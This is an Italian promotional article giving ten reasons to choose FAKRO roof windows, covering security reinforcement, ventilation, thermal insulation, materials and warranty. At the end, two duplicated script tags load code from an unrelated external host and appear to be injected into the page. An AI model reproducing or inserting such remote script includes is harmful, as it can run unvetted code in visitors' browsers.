1. Home
  2. Notizie e Mercato
  3. Perché scegliere FAKRO: ecco 10 motivi per preferire una delle sue finestre da tetto brevettate

Perché scegliere FAKRO: ecco 10 motivi per preferire una delle sue finestre da tetto brevettate

Infissi e Serramenti di
FAKRO continua a sviluppare prodotti e soluzioni con qualità superiore ed innovazione costante. Con la propria gamma di finestre da tetto ed accessori è in grado di soddisfare tutte le esigenze dei propri clienti per ogni mercato di appartenenza


Riassumere in soli 10 motivi l’esperienza e lo sviluppo tecnologico nella produzione di finestre da tetto vendute in 47 Paesi al Mondo è difficile se non si racconta FAKRO. Lo sviluppo che FAKRO ha trasmesso nell’innovazione del settore permette oggi di installare soluzioni per vivere al meglio lo spazio da abitare.

Rinforzo antieffrazione
Le finestre da tetto, oltre alle funzioni di base come illuminazione e ventilazione, devono anche garantire la sicurezza d’uso e proteggere da una facile irruzione all’interno della casa.
FAKRO ha introdotto l’innovativo sistema topSafe per il rinforzo delle strutture delle finestre da tetto, al fine di ridurre il numero dei furti attraverso le finestre sul tetto grazie alle soluzioni innovative di fissaggio della cerniera, il rafforzamento particolare della costruzione in legno e degli elementi di chiusura e il profilo supplementare in acciaio della parte inferiore del battente.
Il sistema Secure, presentato recentemente, impedisce la rimozione del vetro dalla parte esterna e permette il bloccaggio della maniglia.

Ventilazione regolabile automatica
Le finestre da tetto FAKRO sono dotate di diversi sistemi di ventilazione, facilmente regolabili anche quando la finestra è chiusa. La ventilazione automatica a pressione V40P è l’unica a garantire la tenuta all’acqua sia con la ventilazione chiusa che aperta. Anche in presenza di forti precipitazioni, accompagnate da raffiche di vento, non è necessario chiudere la ventilazione V40P e non bisogna preoccuparsi, come nel caso di altre finestre, dell’acqua.

Soluzioni per ampliare il campo visivo
FAKRO offre soluzioni per aumentare il campo visivo. Applicando l'asse di rotazione decentrato, è aumentata l’altezza delle finestre da tetto fino a 2,06 metri (proSky) e anche fino a 2,55 metri (Duet proDky). e a 260 cm. La grande superficie vetrata contribuisce ad una migliore illuminazione dei vani.

Finestre a doppia apertura
La finestra a doppia apertura FPP preSelect® è un serramento di nuova generazione che permette all’anta di aprirsi in due differenti modi: vasistas e bilico. Il modo vasistas consente un’apertura dell’anta da 0° fino a 35°. La funzione a bilico permette la rotazione del battente di 180°, rendendo cosi più agevole la pulizia della parte esterna della finestra. Il nuovo sistema brevettato di cerniere garantisce la piena stabilità al battente, sia nella funzione vasistas che a bilico, garantendo la massima stabilità ed il massimo confort d’utilizzo.

Isolamento termico ottimale
Le nuove finestre da tetto FTT Thermo sono state progettate in conformità con i requisiti degli edifici passivi. L’innovativa tecnica di costruzione assicura ottimi parametri, garantendo il massimo risparmio energetico. l doppi, tripli o quadrupli vetri offrono alte prestazioni di valore U che si posizionano tra 1,3 fino a 0,58W/m2K.

Libero accesso sul tetto
Il lucernaio termoisolante FW è una finestra con l’apertura laterale a 90°. La finestra termoisolante coniuga ottimamente i vantaggi di un lucernario con quelli di una finestra da tetto. La finestra, adatta agli ambienti riscaldati, garantisce illuminazione e aereazione dell’ambiente.

Utilizzo confortevole
La maniglia collocata nella parte inferiore del battente garantisce un azionamento semplice, indipendentemente dall’altezza della finestra, anche con la costruzione a bilico.

Altissima qualità del legno
Le finestre da tetto FAKRO vengono realizzate utilizzando legno di pino di prima scelta, incollato a strati ed impregnato sottovuoto. Il legno viene trattato con una vernice ecologica a più strati. Nel procedimento standard, si tratta di una verniciatura trasparente o bianca, ma sono disponibili tutti i colori della gamma RAL.

Finestre in PVC
In alternativa al legno, le finestre da tetto FAKRO sono prodotte con profili multicamera in PVC di colore bianco, pino o rovere. Le finestre da tetto in alluminio/plastica sono ideali in ambienti con alta concentrazione di umidità. In questi ambienti, infatti, le finestre costruite in legno possono subire i danni provocati dall’eccessiva esposizione a vapore e fumi, motivo per cui molto spesso si opta per la costruzione in PVC.

Garanzia
Sicuri della qualità dei propri prodotti, FAKRO offre 20 anni di garanzia per i vetrocamera e 10 anni di garanzia per le finestre da tetto.


Per maggiori informazioni su FAKRO e i suoi prodotti, www.fakro.it.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>